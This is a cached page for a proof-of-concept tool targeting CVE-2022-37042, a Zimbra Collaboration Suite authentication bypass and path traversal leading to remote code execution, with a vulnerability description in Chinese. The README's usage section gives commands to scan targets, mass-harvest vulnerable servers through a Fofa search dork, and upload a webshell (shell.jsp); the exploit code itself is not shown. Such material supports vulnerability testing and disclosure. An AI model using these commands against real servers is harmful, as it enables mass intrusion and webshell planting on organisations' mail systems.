CVE-2022-37042 PoC — Zimbra Collaboration Suite 路径遍历漏洞

Source

https://github.com/0xf4n9x/CVE-2022-37042

Associated Vulnerability

Title:Zimbra Collaboration Suite 路径遍历漏洞 (CVE-2022-37042)
Description:Zimbra Collaboration Suite（ZCS）是美国Zimbra的一款开源协同办公套件。该产品包括WebMail、日历、通信录等。 Zimbra Collaboration Suite 8.8.15版本、9.0版本存在路径遍历漏洞。攻击者利用该漏洞可以将任意文件上传到系统，从而导致目录遍历和远程代码执行。

Description

CVE-2022-37042 Zimbra Auth Bypass leads to RCE

Readme

# CVE-2022-37042

## Usage

查看漏洞信息。

```bash
go run main.go -s

_______    ________    ___   ____ ___  ___       ______________  __ __ ___
/ ____/ |  / / ____/   |__ \ / __ \__ \|__ \     |__  /__  / __ \/ // /|__ \
/ /    | | / / __/________/ // / / /_/ /__/ /_____ /_ <  / / / / / // /___/ /
/ /___  | |/ / /__/_____/ __// /_/ / __// __/_____/__/ / / / /_/ /__  __/ __/
\____/  |___/_____/    /____/\____/____/____/    /____/ /_/\____/  /_/ /____/

							@_0xf4n9x_

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

[INF] VulnInfo:
{
  "Name": "CVE-2022-37042 Zimbra Auth Bypass leads to RCE",
  "VulID": [
    "CVE-2022-37042"
  ],
  "Version": "1.0",
  "Author": "0xf9",
  "VulDate": "2022-10-07",
  "References": [
    "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
    "https://nvd.nist.gov/vuln/detail/CVE-2022-37042"
  ],
  "AppName": "Zimbra",
  "AppPowerLink": "https://www.zimbra.com/",
  "AppVersion": "Zimbra Collaboration Suite 8.8.15 and 9.0",
  "VulType": "RCE",
  "Description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"zimbra-邮件系统\" \u0026\u0026 (protocol=\"http\" || protocol=\"https\")",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}
```

对单个目标URL进行漏洞检测。

```bash
go run main.go -u http://example.com
```

```bash
echo 'http://example.com' | go run main.go
```

对多个目标进行批量漏洞验证。

```bash
go run main.go -l urls.txt
```

```bash
echo 'app="zimbra-邮件系统" && (protocol="http" || protocol="https")' | fofax -ffi -fs 500 | go run main.go
```

对单个目标进行漏洞利用，上传webshell文件。

```bash
go run main.go -u http://example.com -uf shell.jsp
```

## References

https://github.com/projectdiscovery/nuclei-templates/pull/5134

https://github.com/zer0yu

File Snapshot


 [4.0K]  /data/pocs/0769fb20391d7915f7ad90c1b62738e9f7dbe9d1
├── [ 473]  go.mod
├── [4.0K]  go.sum
├── [ 12K]  main.go
├── [2.3K]  README.md
└── [ 545]  shell.jsp

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!